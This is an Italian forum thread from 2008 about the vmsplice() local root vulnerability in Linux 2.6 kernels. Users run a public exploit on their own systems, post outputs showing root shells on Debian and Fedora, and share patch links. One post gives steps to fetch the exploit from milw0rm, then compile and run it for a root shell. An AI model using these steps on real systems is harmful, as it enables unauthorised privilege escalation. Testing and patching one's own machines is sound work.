|
|
|
![]() |
|
Strumenti |
![]() |
#1 |
Member
Iscritto dal: Oct 2005
Messaggi: 263
|
[CRITICO] Scoperta vulnerabilità locale in Linux 2.6
Scusate, il tag ma come news non è da prendere sottogamba.
Nei kernel distribuiti da Debian ed Ubuntu è stata individuata e confermata una vulnerabilità che garantisce ad un utente locale la possibilità di diventare root, eseguendo semplicemente questo exploit; la falla di sicurezza è stata individuata nell’errato comportamento della system call vmsplice() e, sebbene al momento il bug sia stato confermato solo in Debian ed Ubuntu, è probabile che esso sia presente nella gran parte delle distribuzioni. Sul bug tracker di Debian è già disponibile un workaround che rende inutilizzabile l’exploit. workaround: http://www.ping.uio.no/~mortehu/disa...-exploitable.c fonte: ossblog.it Io ho Sid, e l'exploit era possibile eseguirlo. Ho applicato il workaround ed è tornato tutto normale.
__________________
Non datemi consigli! So sbagliare da solo. - Leo Longanesi (S)Vendo parecchia roba ----Vendo Motorola a835 Ho trattato felicemente con: 29Leonardo,fabri00,pinobigo,Calex81 |
![]() |
![]() |
![]() |
#2 |
Senior Member
Iscritto dal: Aug 2007
Messaggi: 1270
|
Per adesso si sa che funziona su Debian e Ubuntu, non è detto che anche tutte le altre siano vulnerabili.
Su Debian l'ho provato e funziona: $ ./a.out ———————————– Linux vmsplice Local Root Exploit By qaaz ———————————– [+] mmap: 0×0 .. 0×1000 [+] page: 0×0 [+] page: 0×20 [+] mmap: 0×4000 .. 0×5000 [+] page: 0×4000 [+] page: 0×4020 [+] mmap: 0×1000 .. 0×2000 [+] page: 0×1000 [+] mmap: 0xb7e38000 .. 0xb7e6a000 [+] root # Su Fedora8 invece no: $ ./a.out ———————————– Linux vmsplice Local Root Exploit By qaaz ———————————– [+] mmap: 0×0 .. 0×1000 [+] page: 0×0 [+] page: 0×20 [+] mmap: 0×4000 .. 0×5000 [+] page: 0×4000 [+] page: 0×4020 [+] mmap: 0×1000 .. 0×2000 [+] page: 0×1000 [+] mmap: 0xb7fa5000 .. 0xb7fd7000 [-] wtf $ Ultima modifica di arara : 11-02-2008 alle 11:29. |
![]() |
![]() |
![]() |
#3 |
Senior Member
Iscritto dal: Jan 2001
Messaggi: 2289
|
la soluzione e' ricompilare:
http://kernel.org/pub/linux/kernel/v...geLog-2.6.24.2 il codice postato prima pare (non sono un coder, di c capisco poco) che corrompa le pagine di memoria... ah, ovviamente sto bug ha gia' fatto bei danni :P ciao
__________________
FreeBSD, OpenBSD and GNU/Linux User Free Software Foundation Associate Member proudly member of poco-serio™ team! nella foto son quello simpatico... l'altro e' |Stan| |
![]() |
![]() |
![]() |
#4 | |
Senior Member
Iscritto dal: Mar 2005
Messaggi: 1653
|
Quote:
Disabilitando SELinux, anche Fedora è vulnerabile: Codice:
[gianluca@dyane6 ~]$ uname -r 2.6.23.14-115.fc8 [gianluca@dyane6 ~]$ ./bug-linux ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7fae000 .. 0xb7fe0000 [+] root [root@dyane6 ~]# ![]()
__________________
gica78r@ncc-1701:~$ tar -c tar: Codardamente mi rifiuto di creare un archivio vuoto ![]() |
|
![]() |
![]() |
![]() |
#5 |
Senior Member
Iscritto dal: Jan 2001
Messaggi: 2289
|
beh era comprensibile dai...
![]()
__________________
FreeBSD, OpenBSD and GNU/Linux User Free Software Foundation Associate Member proudly member of poco-serio™ team! nella foto son quello simpatico... l'altro e' |Stan| |
![]() |
![]() |
![]() |
#6 |
Senior Member
Iscritto dal: Mar 2005
Messaggi: 1653
|
Ho appena aggiornato Debian Etch, che ora non è più vulnerabile
![]() Più veloci della luce ![]()
__________________
gica78r@ncc-1701:~$ tar -c tar: Codardamente mi rifiuto di creare un archivio vuoto ![]() |
![]() |
![]() |
![]() |
#7 |
Member
Iscritto dal: Oct 2005
Messaggi: 263
|
Nemmeno sid:
----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b0fcf23a000 .. 0x2b0fcf26c000 Killed
__________________
Non datemi consigli! So sbagliare da solo. - Leo Longanesi (S)Vendo parecchia roba ----Vendo Motorola a835 Ho trattato felicemente con: 29Leonardo,fabri00,pinobigo,Calex81 |
![]() |
![]() |
![]() |
#8 | |
Senior Member
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 4418
|
2.6.23.1 su arch:
Quote:
|
|
![]() |
![]() |
![]() |
#9 |
Senior Member
Iscritto dal: Aug 2007
Messaggi: 1270
|
eh no... magari...
Devi fare cosi: apri questa pagina http://www.milw0rm.com/exploits/5092 e salva il contenuto nel file exploit.c, poi esegui da utente normale: gcc exploit.c -o exploit && ./exploit se sei vulnerabile ti ritrovi un una shell di root! ![]() |
![]() |
![]() |
![]() |
#10 |
Senior Member
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 4418
|
arg ieri ho aggiornato a .24 quindi non sono vulnerabile, lo volevo provare doh!
[paolo@Arch-Linux ~]$ gcc exploit.c -o exploit && ./exploit exploit.c:289:28: warning: no newline at end of file ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7e24000 .. 0xb7e56000 [-] vmsplice: Bad address [paolo@Arch-Linux ~]$ vabbè cmq ottimo, lo provo al laboratorio all'università che c'è la sarge ![]() edit: no asp, io ho 24.1 quindi dovrei essere vulnerabile! e allora arch powaaa! Ultima modifica di manowar84 : 12-02-2008 alle 12:39. |
![]() |
![]() |
![]() |
#11 | ||
Senior Member
Iscritto dal: Aug 2007
Messaggi: 1270
|
Quote:
![]() Quote:
Anche il 2.6.24.1 non è vulnerabile, sara per quello: Not Vulnerable: Linux kernel 2.6.24.1 |
||
![]() |
![]() |
![]() |
#12 | |
Senior Member
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 4418
|
Quote:
![]() ok grazie per la info ![]() |
|
![]() |
![]() |
![]() |
#13 |
Senior Member
Iscritto dal: Jan 2004
Città: Cremona
Messaggi: 3661
|
Codice:
rosso@localhost ~ $ gcc exploit.c -o exploit && ./exploit exploit.c:289:28: warning: no newline at end of file ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [-] !@#$ rosso@localhost ~ $ uname -a Linux localhost 2.6.22-sabayon #2 SMP Sun Oct 7 14:20:14 UTC 2007 i686 Unknown CPU Typ AuthenticAMD GNU/Linux rosso@localhost ~ $ |
![]() |
![]() |
![]() |
#14 | |
Senior Member
Iscritto dal: Aug 2007
Messaggi: 1270
|
Quote:
if (!uid || !gid) die("!@#$", 0); Se uno dei due tra uid o gid è 0, cioe root, allora esce. E strano perche vedo che l'hai eseguito con un utente normale, prova a guardare col comando id su che gruppi sei inserito. |
|
![]() |
![]() |
![]() |
#15 | |
Senior Member
Iscritto dal: Jan 2004
Città: Cremona
Messaggi: 3661
|
Quote:
Codice:
rosso@localhost ~ $ id uid=1000(rosso) gid=0(root) gruppi=0(root),6(disk),10(wheel),11(floppy),14(uucp),18(audio),19(cdrom),20(dialout),27(video),35(games),80(cdrw),85(usb),100(users),250(portage),409(clamav),410(messagebus),411(haldaemon),441(scanner),442(plugdev),443(qemu),1008(kvm),1009(vboxusers) rosso@localhost ~ $ EDIT: questo invece con fedora 8 64bit sul portatile SElinux disattivato (in quanto non ho ben capito a cosa serva... ![]() Codice:
bash-3.2$ gcc exploit.c -o exploit && ./exploit exploit.c:290:28: warning: no newline at end of file ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2aaaaaad9000 .. 0x2aaaaab0b000 [+] root bash-3.2# uname -a Linux portatilerosso 2.6.23.14-115.fc8 #1 SMP Mon Jan 21 14:22:56 EST 2008 x86_64 x86_64 x86_64 GNU/Linux bash-3.2# Ultima modifica di red.hell : 12-02-2008 alle 16:34. |
|
![]() |
![]() |
![]() |
#16 | |
Senior Member
Iscritto dal: Jan 2001
Messaggi: 2289
|
Quote:
![]()
__________________
FreeBSD, OpenBSD and GNU/Linux User Free Software Foundation Associate Member proudly member of poco-serio™ team! nella foto son quello simpatico... l'altro e' |Stan| |
|
![]() |
![]() |
![]() |
#17 | |
Senior Member
Iscritto dal: Aug 2007
Messaggi: 1270
|
Quote:
anche per fedora comunque è uscito il nuovo kernel patchato. |
|
![]() |
![]() |
![]() |
#18 |
Senior Member
Iscritto dal: Jun 2005
Città: Napoli
Messaggi: 2599
|
a me da questo output:
Codice:
----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dc6000 .. 0xb7df8000 [-] vmsplice: Bad address ![]()
__________________
Hp pavilion dv6-1250el [cpu: P8700 - ati radeon hd 4650 1 gb - 4 gb ram - hd 320 7200 rpm!] Garmin Official Thread |
![]() |
![]() |
![]() |
#19 |
Senior Member
Iscritto dal: Dec 2004
Messaggi: 3573
|
Ci credo, praticamente sono assembly e system call
![]() Lungi dall'averci capito qualcosa è ![]()
__________________
Debian amd64 | Gentoo amd64 | AMD Athlon64 3800+ X2@2701Mhz vcore 1.49V | Placing an unpatched Windows computer directly onto the Internet in the hope that it downloads the patches faster than it gets exploited are odds that you wouldn't bet on in Vegas | e-mail+jabber: darkbasic|a.t|linuxsystems|d.o.t|it | www.linuxsystems.it |
![]() |
![]() |
![]() |
#20 |
Senior Member
Iscritto dal: Jul 2002
Messaggi: 4251
|
A me fa in seg fault O_o
|
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 19:15.